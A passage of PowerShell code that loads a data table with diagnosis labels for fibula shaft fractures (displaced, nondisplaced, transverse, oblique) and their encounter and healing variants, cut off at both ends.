$DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of left fibula","Unspecified fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of unspecified fibula","Unspecified fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of right fibula","Displaced transverse fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of left fibula","Displaced transverse fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of shaft of unspecified fibula","Displaced transverse fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of right fibula","Nondisplaced transverse fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of left fibula","Nondisplaced transverse fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of shaft of unspecified fibula","Nondisplaced transverse fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of right fibula","Displaced oblique fracture of shaft of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left fibula","Displaced oblique fracture of shaft of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified fibula","Displaced oblique fracture of shaft of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right fibula","Nondisplaced oblique fracture of shaft of right fibula, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced 